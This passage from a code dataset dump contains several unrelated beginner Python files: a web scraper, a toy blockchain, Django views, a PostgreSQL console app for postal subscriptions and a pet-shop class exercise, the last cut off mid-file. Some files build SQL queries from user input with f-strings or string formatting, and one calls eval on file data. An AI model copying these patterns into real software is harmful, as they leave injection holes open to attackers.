self.cache['users'].append(parsed['user'])\n self.cache['users'].sort()\n ChatSocketHandler.update_users(self)\n\n #return messages\n chat = {}\n chat[\"messages\"] = ChatSocketHandler.cache['messages']\n chat[\"type\"] = \"auth\"\n ChatSocketHandler.send_updates(chat)\n\n elif parsed['type'] == \"message\":\n #get session key\n user = self.get_user()\n\n message = {\n \"id\": str(uuid.uuid4()),\n \"body\": parsed[\"body\"],\n \"username\": user['username'],\n \"timestamp\": datetime.now().isoformat()\n }\n\n chat = {\"type\": 'message', \"messages\": [message]}\n\n ChatSocketHandler.update_message_cache(message)\n ChatSocketHandler.send_updates(chat)\n\n\ndef main():\n tornado.options.parse_command_line()\n app = Application()\n app.listen(options.port)\n tornado.ioloop.IOLoop.instance().start()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"betoncombat/betoncombat","sub_path":"chat/chat_server.py","file_name":"chat_server.py","file_ext":"py","file_size_in_byte":4941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73220904420","text":"\"\"\"\n抓取豆瓣电影排行榜\n\"\"\"\nimport re\n\nimport requests\nimport time\nimport random\nfrom fake_useragent import UserAgent\nimport json\n\n\nclass DoubanSpider:\n def __init__(self):\n self.get_js_url = 'https://movie.douban.com/j/chart/top_list?type={}&interval_id=100%3A90&action=&start={}&limit=20'\n self.index_url = 'https://movie.douban.com/chart'\n self.get_total_url = 'https://movie.douban.com/j/chart/top_list_count?type={}&interval_id=100%3A90'\n\n def get_html(self, url):\n headers = {'User-Agent': UserAgent().random}\n html = requests.get(url=url, headers=headers).text\n return html\n\n def parse_js_html(self, url):\n html = self.get_html(url=url)\n html = json.loads(html)\n for one_file_dict in html:\n item = {}\n item['rank'] = one_file_dict['rank']\n item['title'] = one_file_dict['title']\n item['score'] = one_file_dict['score']\n item['time'] = one_file_dict['release_date']\n print(item)\n\n def get_total(self, url):\n html = self.get_html(url=url)\n json_obj = json.loads(html)\n total = json_obj['total']\n return total\n\n def get_category(self, category):\n regex = '''{}'''.format(category)\n html = self.get_html(self.index_url)\n href = re.findall(regex, html)[0]\n return re.findall('type=(.*?)&', href, re.S)[0]\n\n def crawl(self):\n category = input(\"\"\"请输入电影的种类\n 剧情,喜剧,动作,爱情,科幻,动画,悬疑,惊悚,恐怖,纪录片,短片,情色,同性,音乐,歌舞,家庭,儿童,传记,历史,战争,犯罪,西部,奇幻,冒险,灾难,武侠,古装,运动,黑色电影\n \"\"\")\n type = self.get_category(category)\n total = self.get_total(self.get_total_url.format(type))\n for start in range(1,total,20):\n url = self.get_js_url.format(type, start)\n # print(url)\n self.parse_js_html(url)\n time.sleep(random.uniform(0,2))\n\n\n\nif __name__ == '__main__':\n spider = DoubanSpider()\n spider.crawl()\n","repo_name":"chaofan-zheng/python_learning_code","sub_path":"month05/Spider/day04_course/day04_code/06_doubanSpider.py","file_name":"06_doubanSpider.py","file_ext":"py","file_size_in_byte":2139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"1340742415","text":"def graphToGenome(genome):\n\tlist1 = []\n\tvertices = []\n\tedges = []\n\tisTrue = True\n\tfor i in range(len(genome)*2):\n\t\tedges.append(0)\n\n\tfor i in genome:\n\t\tedges[i[1]-1] = i[0] - 1\n\t\tedges[i[0]-1] = i[1] - 1\n\n\tfor j in genome:\n\t\tbegin = j[0]\n\n\t\tif begin in vertices:\n\t\t\tcontinue\n\t\tif begin%2 == 0:\n\t\t\tend = 
begin-1\n\t\telse:\n\t\t\tend = begin+1\n\t\t\t\n\t\tP = []\n\t\ti = 0\n\t\twhile(isTrue):\n\t\t\tif begin%2 == 0:\n\t\t\t\tP.append(begin/2)\n\t\t\telse:\n\t\t\t\tP.append(-(begin+1)/2)\n\t\t\tdest = edges[begin-1]+1\n\t\t\ti += 1\n\t\t\tvertices.append(dest)\n\t\t\tif dest == end:\n\t\t\t\tlist1.append(P)\n\t\t\t\tbreak\n\n\t\t\tif dest%2 == 0:\n\t\t\t\tbegin = dest - 1\n\t\t\telse:\n\t\t\t\tbegin = dest + 1\n\n\treturn list1\n\ndef main():\n\tfile1 = open('input5.txt')\n\tpfile1 = file1.readlines()[0]\n\tpfile1 = pfile1.replace(\")(\", \"),(\")\n\tpfile1 = pfile1.replace(\" \", \"\")\n\tP = eval(\"[%s]\" % pfile1)\n\ttext = graphToGenome(P)\n\t#print text\n\tf = open('ot3.txt')\n\tline = f.readline().replace('[', '(').replace(']',')').replace(', ', ' ').replace(') (', ')(').replace('((','(').replace('))',\")\")\n\toutput = open('output.txt', 'w')\n\toutput.write(line)\n\t#print line\n\nmain()\n\n\n\n\n\n","repo_name":"kedarpujara/BioinformaticsAlgorithms","sub_path":"Rosalind1/Prob58/graphGenome.py","file_name":"graphGenome.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16292599087","text":"import hashlib\nimport json\nfrom time import time\nfrom .proof_of_work import proof_of_work\n\n\nclass Blockchain():\n    def __init__(self, difficulty=16, load=None, **kwargs):\n        self.difficulty = difficulty\n        self._chain = []\n        self._pending_transactions = []\n\n        if load is None:\n            nonce, hash_result = proof_of_work('root_hash', difficulty)\n            self.new_block(proof=nonce, previous_hash=hash_result)\n        else:\n            self.read(load, **kwargs)\n\n    def add_transaction(self, sender, recipient, amount):\n        \"\"\"Add a new transaction to the pending transactions.\"\"\"\n        transaction = {\n            'sender': sender,\n            'recipient': recipient,\n            'amount': float(amount)\n        }\n\n        self._pending_transactions.append(transaction)\n\n    def hash(self, block):\n        string_object = json.dumps(block, sort_keys=True)\n        block_string = string_object.encode()\n\n        raw_hash = hashlib.sha256(block_string)\n        hex_hash = raw_hash.hexdigest()\n\n        return hex_hash\n\n    @property\n    def last_block(self):\n        \"\"\"Return the most recent block.\"\"\"\n        return self._chain[-1]\n\n    def new_block(self, proof, previous_hash=None):\n        block = {\n            'index': self.number_blocks,\n            'timestamp': time(),\n            'transactions': self._pending_transactions,\n            'proof': proof,\n            'previous_hash': previous_hash or self.hash(self.last_block),\n        }\n\n        self._chain.append(block)\n        self._pending_transactions = []\n\n    @property\n    def number_blocks(self):\n        \"\"\"Return the number of blocks in the chain.\"\"\"\n        return len(self._chain)\n\n    @property\n    def number_pending_transactions(self):\n        \"\"\"Return the number of pending transactions.\"\"\"\n        return len(self._pending_transactions)\n\n    def read(self, path, **kwargs):\n        with open(path, 'r') as fp:\n            read_data = json.load(fp, **kwargs)\n\n        for idx, block in enumerate(read_data):\n            if idx > 0:\n                if self.hash(self.last_block) != block['previous_hash']:\n                    raise(ValueError('Different block hashes!'))\n\n            self._chain.append(block)\n\n    def write(self, path, **kwargs):\n        with open(path, 'w') as fp:\n            json.dump(self._chain, fp, **kwargs)","repo_name":"polynomialchaos/pyblockchain","sub_path":"pyblockchain/blockchain.py","file_name":"blockchain.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"23317151793","text":"from django.urls import 
path\nfrom .views import *\n\nurlpatterns = [\n path('', IndexListView.as_view(), name='index'),\n path('shop/', ShopView.as_view(), name='shop'),\n path('product//', ProductDetail.as_view(), name='product'),\n path('sign_in/', login_register, name='login_register'),\n path('login/', user_login, name='login'),\n path('register/', user_register, name='register'),\n path('logout/', user_logout, name='logout'),\n path('save_review//', save_review, name='save_review'),\n path('cart/', cart, name='cart'),\n path('to_cart///', to_cart, name='to_cart'),\n path('checkout/', checkout, name='checkout'),\n path('payment/', create_checkout_session, name='payment'),\n path('success/', success_payment, name='success')\n]\n","repo_name":"fomichevevgeniy/furni_shop_django","sub_path":"untree/store/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38610493029","text":"import psycopg2\nfrom psycopg2 import OperationalError, ProgrammingError\nfrom tabulate import tabulate\n\n\n# Функций подключения\ndef create_connection(db, user, password, host, port):\n connection = None\n try:\n connection = psycopg2.connect(\n database=db,\n user=user,\n password=password,\n host=host,\n port=port\n )\n print('Соединение с базой данных Белпочты установлено.')\n print()\n except OperationalError as e:\n print(f'Произошла ошибка \"{e}\"')\n print('Соединение с базой данных Белпочты НЕ установлено!\\n'\n 'Все внесенные изменения не будут сохранены!\\n'\n 'Подключите базу данных!')\n print()\n\n return connection\n\n\ndef execute_query(connection, query):\n '''\n Функция исполняет запрос в базе данных и в случае успешного выполнения выводит\n сообщение об успешном действии\n Для таких запросов как INSERT INTO и т.д.\n '''\n connection.autocommit = True\n cursor = connection.cursor()\n try:\n cursor.execute(query)\n connection.commit()\n print('Ваш запрос выполнен')\n except OperationalError as e:\n print(f'Произошла ошибка \"{e}\"')\n\n\ndef fetchall_query(connection, query):\n '''\n Функция для запросов, с помощью которых можно получить данные\n например SELECT и т.д.\n '''\n connection.autocommit = True\n cursor = connection.cursor()\n try:\n cursor.execute(query)\n connection.commit()\n try:\n columns = [desc[0] for desc in cursor.description]\n record = cursor.fetchall()\n print(tabulate(record, headers=columns, tablefmt='psql'))\n # for rec in record:\n # print(rec)\n except ProgrammingError as e:\n print(f'Произошла ошибка \"{e}\"')\n except OperationalError as e:\n print(f'Произошла ошибка \"{e}\"')\n\n\n# Главное меню программы\ndef main_menu():\n command = input('Введите номер команды: \\n'\n '1 - Работа с получателями\\n'\n '2 - Работа с подписками\\n'\n '3 - Работа с изданиями\\n'\n 'exit - выход из программы\\n'\n 'Ваша команда : ')\n print()\n return command\n\n\n# Подменю \"Получатель\" и его функции\ndef menu_poluchateli():\n command = input('Введите номер команды: \\n'\n '1 - Добавить нового получателя\\n'\n '2 - Удалить получателя\\n'\n '3 - Выбрать получателя\\n'\n '4 - Посмотреть всех получателей\\n'\n '5 - Выйти в предыдущее меню\\n'\n 'exit - выход в главное меню\\n'\n 'Ваша команда : ')\n print()\n return command\n\n\ndef new_poluchatel():\n kod_poluchatelya = input('Введите код получателя: ')\n fio = input('Введите ФИО получателя: ')\n address = input('Введите адрес получателя: ')\n query = f\"INSERT INTO poluchatel VALUES ({kod_poluchatelya}, '{fio}', '{address}');\"\n 
return query\n\n\ndef del_poluchatel():\n print('Вы собираетесь удалить получателя из базы данных\\n')\n kod_poluchatelya = input('Введите код получателя, которого вы хотите удалить из базы данных: ')\n query = f\"DELETE FROM poluchatel WHERE kod_poluchatelya = {kod_poluchatelya};\"\n return query\n\n\ndef choose_poluchatel():\n flag = True\n while flag:\n kod_poluchatelya = input('Введите код получателя, информацию о котором вы хотите узнать: ')\n if kod_poluchatelya.isdigit():\n query = f\"SELECT * FROM poluchatel WHERE kod_poluchatelya = {kod_poluchatelya};\"\n flag = False\n return query\n else:\n flag = True\n print('Команда не найдена')\n print()\n\n\ndef all_poluchatel():\n query = f\"SELECT * FROM poluchatel;\"\n return query\n\n\n# Подменю \"Подписки\" и его функции\ndef menu_podpiski():\n command = input('Введите номер команды: \\n'\n '1 - Добавить новою подписку\\n'\n '2 - Удалить подписку\\n'\n '3 - Выбрать подписку\\n'\n '4 - Посмотреть все оформленные подписки\\n'\n '5 - Выйти в предыдущее меню\\n'\n 'exit - выход из программы\\n'\n 'Ваша команда : ')\n print()\n return command\n\n\ndef new_podpiska():\n kod_poluchatelya = input('Введите код получателя: ')\n idx_izdaniya = input('Введите индекс издания: ')\n srok_podpiski = input('Введите срок подписки: ')\n while srok_podpiski not in ('1', '3', '6'):\n print('Доступный срок подписки: 1, 3 или 6 месяцев\\n')\n srok_podpiski = input('Введите срок подписки: ')\n month = input('Введите месяц начала доставки издания: ')\n while month not in ('1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12'):\n print('Диапазон месяцев от 1 до 12\\n')\n month = input('Введите месяц начала доставки издания: ')\n year = input('Введите год начала доставки издания: ')\n query = f\"INSERT INTO podpiski VALUES ({kod_poluchatelya}, {idx_izdaniya}, {srok_podpiski}, {month}, {year});\"\n return query\n\n\ndef del_podpiska():\n print('Вы собираетесь удалить подписку из базы данных\\n')\n kod_poluchatelya = input('Введите код получателя, подписку которого вы хотите удалить из базы данных: ')\n idx_izdaniya = input('Введите индекс издания, на которое оформлена подписка: ')\n query = f\"DELETE FROM podpiski WHERE kod_poluchatelya = {kod_poluchatelya} AND idx_izdaniya = {idx_izdaniya};\"\n return query\n\n\ndef choose_podpiska():\n kod_poluchatelya = input('Введите код получателя, информацию о подписке которого вы хотите узнать: ')\n idx_izdaniya = input('Введите индекс издания, на которое оформлена подписка получателя: ')\n query = f\"SELECT * FROM podpiski WHERE kod_poluchatelya = {kod_poluchatelya} AND idx_izdaniya = {idx_izdaniya};\"\n return query\n\n\ndef all_podpiska():\n query = f\"SELECT * FROM podpiski;\"\n return query\n\n\n# Подменю \"Издания\" и его функции\ndef menu_izdaniya():\n command = input('Введите номер команды: \\n'\n '1 - Добавить новою издание\\n'\n '2 - Удалить издание\\n'\n '3 - Выбрать издание\\n'\n '4 - Посмотреть все доступные для подписки издания\\n'\n '5 - Выйти в предыдущее меню\\n'\n 'exit - выход из программы\\n'\n 'Ваша команда : ')\n print()\n return command\n\n\ndef new_izdaniya():\n idx_izdaniya = input('Введите индекс издания: ')\n vid_izdaniya = input('Введите вид издания: ')\n name_izdaniya = input('Введите название издания: ')\n price = input('Введите стоимость подписки на издание на 1 мес.: ')\n query = f\"INSERT INTO izdaniya VALUES ({idx_izdaniya}, '{vid_izdaniya}', '{name_izdaniya}', {price});\"\n return query\n\n\ndef del_izdaniya():\n print('Вы собираетесь удалить издание из базы данных\\n')\n 
idx_izdaniya = input('Введите индекс издания, которое вы хотите удалить: ')\n query = f\"DELETE FROM izdaniya WHERE idx_izdaniya = {idx_izdaniya};\"\n return query\n\n\ndef choose_izdaniya():\n idx_izdaniya = input('Введите индекс издания, информацию о котором вы хотите узнать: ')\n query = f\"SELECT * FROM izdaniya WHERE idx_izdaniya = {idx_izdaniya};\"\n return query\n\n\ndef all_izdaniya():\n query = f\"SELECT * FROM izdaniya;\"\n return query\n\n\n# Функция запуска программы\ndef start_program():\n # Вызываем главное меню и не завершаем программу пока пользователь\n # Не введет 'exit'\n command = main_menu()\n while command != 'exit':\n # Вызываем подменю \"Получатель\"\n if command == '1':\n command = menu_poluchateli()\n while command != 'exit':\n if command == '1':\n execute_query(connection, new_poluchatel())\n print('Новый получатель добавлен')\n print()\n command = menu_poluchateli()\n elif command == '2':\n execute_query(connection, del_poluchatel())\n print('Получатель удален')\n print()\n command = menu_poluchateli()\n elif command == '3':\n fetchall_query(connection, choose_poluchatel())\n command = menu_poluchateli()\n print()\n elif command == '4':\n fetchall_query(connection, all_poluchatel())\n print()\n command = menu_poluchateli()\n elif command == '5':\n command = main_menu()\n break\n elif command == 'exit':\n command = 'exit'\n elif command not in (1, 2, 3, 4, 5):\n print('Команда не найдена')\n print()\n command = menu_poluchateli()\n # Вызываем подменю \"Подписки\"\n elif command == '2':\n command = menu_podpiski()\n while command != 'exit':\n if command == '1':\n execute_query(connection, new_podpiska())\n print('Новый подписка добавлена')\n print()\n command = menu_podpiski()\n elif command == '2':\n execute_query(connection, del_podpiska())\n print('Подписка удалена')\n print()\n command = menu_podpiski()\n elif command == '3':\n fetchall_query(connection, choose_podpiska())\n command = menu_podpiski()\n print()\n elif command == '4':\n fetchall_query(connection, all_podpiska())\n print()\n command = menu_podpiski()\n elif command == '5':\n command = main_menu()\n break\n elif command == 'exit':\n command = 'exit'\n elif command not in (1, 2, 3, 4, 5):\n print('Команда не найдена')\n print()\n command = menu_poluchateli()\n # Вызываем подменю \"Издания\"\n elif command == '3':\n command = menu_izdaniya()\n while command != 'exit':\n if command == '1':\n execute_query(connection, new_izdaniya())\n print('Новое издание добавлено')\n print()\n command = menu_izdaniya()\n elif command == '2':\n execute_query(connection, del_izdaniya())\n print('Издание удалено')\n print()\n command = menu_izdaniya()\n elif command == '3':\n fetchall_query(connection, choose_izdaniya())\n command = menu_izdaniya()\n print()\n elif command == '4':\n fetchall_query(connection, all_izdaniya())\n print()\n command = menu_izdaniya()\n elif command == '5':\n command = main_menu()\n break\n elif command == 'exit':\n command = 'exit'\n elif command not in (1, 2, 3, 4, 5):\n print('Команда не найдена')\n print()\n command = menu_poluchateli()\n\n\ndef eng_program():\n if connection:\n connection.close()\n print('Соединение с базой данный закрыто')\n else:\n print('Соединение с базой данных не было установлено. 
Программа закрыта')\n\n\nconnection = create_connection('bel_post_2', 'postgres', '1234', '127.0.0.1', '5432')\nstart_program()\neng_program()\n","repo_name":"WiFighter01/College","sub_path":"Homework/connection_to_db.py","file_name":"connection_to_db.py","file_ext":"py","file_size_in_byte":14237,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29203893825","text":"from django.shortcuts import render, redirect\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils import timezone\nfrom django.db import connection\nfrom django.db import transaction\n\nfrom .models import Gifts, Bucket, GiftItemOrder\n\n\ndef view_gifts(request, template_name='view_gifts.html'):\n \n books_gifts = Gifts.objects.filter(caregory='Books')\n flowers_gifts = Gifts.objects.filter(caregory='Flowers')\n other_gifts = Gifts.objects.filter(caregory='Other')\n\n return render(request, template_name, {'books_gifts': books_gifts,\n 'flowers_gifts': flowers_gifts,\n 'other_gifts': other_gifts})\n\n@login_required(login_url='/login/')\ndef view_gift_details(request, pk):\n template_name='view_gift_details.html'\n gift = Gifts.objects.get(pk=pk)\n\n if request.method == 'GET':\n return render(request, template_name, {'gift': gift})\n\n elif request.method == 'POST':\n\n gift_quantity = request.POST.get('gift_quantity')\n\n gift.quantity -= int(gift_quantity)\n gift.save()\n\n bucket = Bucket.objects.get(user_id=request.user.id, is_ordered=False)\n\n giftitem = GiftItemOrder.objects.create(gift_id=pk, quantity=gift_quantity,\n bucket_id=bucket.id)\n\n return redirect(reverse('gifts:view_bucket_details', args=(bucket.id,)))\n\n\n@login_required(login_url='/login/')\ndef view_buckets(request, template_name='view_buckets.html'):\n \n buckets = Bucket.objects.filter(user_id=request.user.id)\n\n if not buckets:\n Bucket.objects.create(user_id=request.user.id, name='My Gift Bucket')\n\n\n return render(request, template_name, {'buckets': buckets})\n\n\n@login_required(login_url='/login/')\ndef view_bucket_details(request, pk):\n template_name='view_bucket_details.html'\n # bucket = Bucket.objects.get(pk=pk)\n bucket = Bucket.objects.raw('SELECT * FROM GIFTS_BUCKET WHERE ID = {}'.format(pk))[0]\n\n\n giftitemorder = GiftItemOrder.objects.filter(bucket_id=bucket.id)\n if request.method == 'GET':\n return render(request, template_name, {'bucket': bucket, 'giftitemorder': giftitemorder})\n\n if request.method == 'POST':\n new_bucket_name = request.POST.get('new_bucket_name')\n\n with transaction.atomic():\n cursor = connection.cursor()\n cursor.execute('SET TRANSACTION ISOLATION LEVEL SERIALIZABLE')\n\n\n bucket.is_ordered = True\n bucket.ordered_time = timezone.now()\n bucket.save()\n\n # If name `MyName` exist - replase to `MyName(1)` or `MyName(2)` ...\n i = 0\n while True:\n i += 1\n is_exist = Bucket.objects.filter(user_id=request.user.id, name=new_bucket_name)\n if not is_exist:\n Bucket.objects.create(user_id=request.user.id, name=new_bucket_name)\n break\n else:\n new_bucket_name = new_bucket_name + '(' + str(i) + ')'\n\n return render(request, template_name, {'bucket': bucket, 'giftitemorder': giftitemorder})\n\n\n\n","repo_name":"UsenkoArtem/amis-1","sub_path":"students/km41/Tokar/GIFT_SHOPPING/gift_shopping/gifts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} 
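Note on the Django views record above: its bucket-renaming loop appends '(1)', '(2)', ... until the name is free, but it concatenates onto the previously tried candidate, so repeated collisions produce names like 'My Bucket(1)(2)'. A minimal standalone sketch of the intended pattern, rebuilding each candidate from the base name; the function next_free_name and the plain set of existing names are illustrative, not part of the record:

def next_free_name(base, existing):
    # Try base, then base(1), base(2), ... until one is unused.
    candidate = base
    i = 0
    while candidate in existing:
        i += 1
        candidate = "%s(%d)" % (base, i)
    return candidate

existing = {"My Gift Bucket", "My Gift Bucket(1)"}
print(next_free_name("My Gift Bucket", existing))  # -> My Gift Bucket(2)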
+{"seq_id":"30823599309","text":"customer = {\n \"name\": \"Kevin Liew\",\n \"age\": \"19\",\n \"is verified\": True\n}\n\ncustomer[\"birthdate\"] = \"22 September 2002\"\nprint(customer[\"birthdate\"])\n\n\nnumbers = {\n \"1\": \"One\",\n \"2\": \"Two\",\n \"3\": \"Three\",\n \"4\": \"Four\",\n \"5\": \"Five\", \n \"6\": \"Six\",\n \"7\": \"Seven\",\n \"8\": \"Eight\",\n \"9\": \"Nine\"\n}\n\nnumber = input(\"Phone: \")\noutput = \"\"\nfor ch in number:\n # If list doesn't have that value, we can make it use the ! by default instead\n # Create an output string\n output += numbers.get(ch, \"!\") + \" \"\n\nprint(output)\n","repo_name":"Kiwibeing/Lessons","sub_path":"dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"23484251904","text":"import numpy as np\n\ndef load():\n template = {}\n with open(\"../file.txt\", 'r') as file:\n for line in file:\n pair = line.strip().split(\" -> \")\n template[pair[0]] = pair[1]\n return template\n\ndef dicCount(total):\n occurrences = {}\n for x in total:\n if x in occurrences:\n occurrences[x] += 1\n if x not in occurrences:\n occurrences[x] = 1\n key_max = max(occurrences.values())\n key_min = min(occurrences.values())\n return key_max, key_min\n\ndef runSequence(template):\n initial = ['B','N','S','O','S','B','B','K','P','C','S','C','P','K','P','O','P','N','N','K']\n for i in range(6):\n print(f\"day {i}\")\n new = []\n for x in range(0, len(initial)-1):\n new.append(initial[x])\n new.append(template[f\"{initial[x]}{initial[x+1]}\"])\n new.append(initial[x+1])\n initial = new\n return new\n\ndef main():\n template = load()\n total = runSequence(template)\n print(len(total))\n max_v, min_v = dicCount(total)\n print(max_v - min_v) \nif __name__ == \"__main__\":\n main() ","repo_name":"BrunoGrifo/codeAdvent2021","sub_path":"day14/part1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20864942413","text":"# get_heros.py\n# 引入模块 \nimport requests \nimport json \nimport os\nimport time\n \nst = time.time() #程序开始时间\nurl = 'http://pvp.qq.com/web201605/js/herolist.json'\nresponse=requests.get(url).content\n \n# 提取Json信息\njsonData=json.loads(response) \nprint(jsonData)\n\n# 初始化下载数量 \nx = 0 \n \n#目录不存在则创建 \nhero_dir='/Users/mm/python/python-examples/heros/imgs/' \nif not os.path.exists(hero_dir):\n os.mkdir(hero_dir)\n \nfor m in range(len(jsonData)):\n # 英雄编号 \n ename = jsonData[m]['ename'] \n # 英雄名称 \n cname = jsonData[m]['cname'] \n # 皮肤名称,一般英雄会有多个皮肤 \n skinName = jsonData[m]['skin_name'].split('|') \n # 皮肤数量 \n skinNumber = len(skinName)\n \n # 循环遍历处理\n for bigskin in range(1,skinNumber+1):\n # 拼接下载图片url\n picUrl = 'http://game.gtimg.cn/images/yxzj/img201606/skin/hero-info/'+str(ename)+'/'+str(ename)+'-bigskin-'+str(bigskin)+'.jpg'\n #获取图片内容 \n picture = requests.get(picUrl).content \n # 保存图片 \n with open( hero_dir + cname + \"-\" + skinName[bigskin-1]+'.jpg','wb') as f:\n f.write(picture)\n x=x+1\n print(\"当前下载第\"+str(x)+\"张皮肤\") \n# 获取结束时间 \nend = time.time()\n# 计算执行时间\nexec_time = end-st \nprint(\"找到并下载\"+str(x)+\"张图片,总共用时\"+str(exec_time)+\"秒。\")\n","repo_name":"zhuby1973/map","sub_path":"jiguang/heros/get_heros.py","file_name":"get_heros.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} 
+{"seq_id":"19660739608","text":"### ASSUMPTIONS ###\n\n# Ordinal Dependent Variable (binary) (Y) \n# Independent Observations (Y) \n# No multicollinearity (!!!) (X)\n# Data is suitable for log odds relationship (Y) \n\n## Import useful libraries\nimport pandas as pd\nfrom statsmodels.stats.outliers_influence import variance_inflation_factor\nfrom tqdm import tqdm\nimport numpy as np\n\n## Read in data\nfeedToModelData = pd.read_csv('feedToModelData.csv', index_col = 0)\nfeedToModelData.iloc[:,2:-1].corr().to_csv('correlationMatrix.csv')\n\n\n### The work here is designed to correct the multicollinearity assumption, \n### which is currently being violated \n\n## Define function to calculate Variable Inflation Factor\ndef calc_vif(X):\n # Calculating VIF\n vif = pd.DataFrame()\n vif[\"variables\"] = X.columns\n vif[\"VIF\"] = [variance_inflation_factor(X.values, i) for i in range(X.shape[1])]\n\n return(vif)\n\nfor i in tqdm(range(1, 751)): \n try: \n ## Run function to produce VIFs\n X = feedToModelData.iloc[:i,2:-1]\n calc_vif(X)\n\n except: \n print('error')\n feedToModelData = feedToModelData.drop(i - 1)\n\nval = 1000000\ni = 0\n\nfeedToModelDataLoop = feedToModelData\nfeedToModelDataLoop = feedToModelDataLoop.loc[:, feedToModelDataLoop.columns != 'Team1Win']\nwhile val > 100: \n i += 1\n dfSource = calc_vif(feedToModelDataLoop)\n dfSource = dfSource[~dfSource.isin([np.nan, np.inf, -np.inf]).any(1)]\n VIFDF = pd.DataFrame(dfSource)\n VIFDF = VIFDF.sort_values(by = 'VIF', ascending = False).reset_index(drop = True)\n \n \n val = VIFDF.iloc[0]['VIF']\n \n VIFDF = VIFDF.iloc[1:]\n \n variables = list(VIFDF['variables'])\n \n feedToModelDataLoop = feedToModelDataLoop[variables]\n\nvariables = variables + ['Team1Win']\nfeedToModelData = feedToModelData[variables]\n\n### We now meet the assumption for multicollinearity\n\n# feedToModelData.to_csv('feedToModelData2.csv')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"aks5bx/NCAA_Model_Comparisons","sub_path":"assumptionsCheck.py","file_name":"assumptionsCheck.py","file_ext":"py","file_size_in_byte":1966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"30707934769","text":"# Pet Shop OOP Assingment\n\n# Shannon Murray\n# J.R. 
Smith\n# Alex Bennett\n# Miller Hardy\n\n# This program prompts the user to enter the number of customers for the \"Critter Watch\" Pet Boarding company.\n# Data on each customer, their pet, and their pet's appointment is recorded, and a bill statement is printed.\n# The user can then specify a payment, and an updated bill statement is printed for the current customer.\n\nfrom datetime import datetime\n\n#Customer class\nclass Customer :\n\n    # Class variable\n    company_name = \"Critter Watch\"\n\n    # Constructor - receives parameters from user to assign to attributes\n    def __init__(self, fName, lName, cusAddress1, cusAddress2, cusCity, cusState, cusZip) :\n        self.first_name = fName\n        self.last_name = lName\n        self.address1 = cusAddress1\n        # calculates cust_id by calling the gen_id method; passes parameters with leading/trailing spaces removed\n        self.cust_id = self.gen_id(self.first_name.strip(), self.last_name.strip(), self.address1.strip())\n        self.address2 = cusAddress2\n        self.city = cusCity\n        self.state = cusState\n        self.zip = cusZip\n        self.balance = 0.0\n        # cust_pet holds this customer's list of Pet objects\n        self.cust_pet = []\n\n    # generates customer id using the first 3 letters from first and last name, and the first 5 letters of the address\n    def gen_id(self, fName, lName, firstAddress) :\n        newCusID = fName[0:3] + lName[0:3] + firstAddress[0:5]\n        # Replace any spaces in the string with no space ('')\n        newCusID = newCusID.replace(\" \", \"\")\n        return(newCusID)\n\n    # Return summary statement for the customer pet appointment bill\n    def return_bill(self) : \n        return(\"Customer \" + self.cust_id + \" with name \" + self.first_name + \" \" + self.last_name + \" owes $\" + \\\n               str(self.balance) + \" for \" + self.cust_pet[len(self.cust_pet) - 1].pet_name + \"'s stay from \" + \\\n               str(self.cust_pet[len(self.cust_pet) - 1].appointment[len(self.cust_pet[len(self.cust_pet) - 1].appointment) - 1].begin_date.strftime(\"%m/%d/%Y\")) + \" to \" + \\\n               str(self.cust_pet[len(self.cust_pet) - 1].appointment[len(self.cust_pet[len(self.cust_pet) - 1].appointment) - 1].end_date.strftime(\"%m/%d/%Y\")))\n\n    # receives payment from the user and updates the customer balance\n    def make_payment(self, fPayment) :\n        self.balance = round(self.balance - fPayment, 2)\n\n# Pet class:\nclass Pet() :\n    # Instance Variables:\n    def __init__(self, petName, sBreed, iAge, oOwner) :\n        self.pet_name = petName\n        self.breed = sBreed\n        self.age = iAge\n        self.owner = oOwner\n        self.appointment = []\n        # creates new appointment object \n        self.appointment.append(Appointment(self.owner))\n\n# Appointment class:\nclass Appointment() :\n\n    # constructor\n    def __init__(self, oOwner) :\n        self.owner = oOwner\n\n    # receives parameters from the user and stores them to attributes\n    def set_appointment(self, beginDate, endDate, dayRate) :\n        self.begin_date = beginDate\n        self.end_date = endDate\n        self.day_rate = dayRate\n        # calls the calc_days() method to generate additional attributes\n        self.calc_days()\n        # add cost to customer balance\n        self.owner.balance += self.total_cost\n\n    # determines how many days the appointment lasted and the total cost of the appointment\n    def calc_days(self) :\n        self.total_days = (self.end_date - self.begin_date).days\n        # If the appointment began and ended on the same day, count it as 1 day\n        if(self.total_days <= 0) :\n            self.total_days = 1\n        self.total_cost = self.total_days * self.day_rate\n        \n\n# collect customer, pet, and appointment information for each customer \n# determine number of customers\nnumCustomers = 
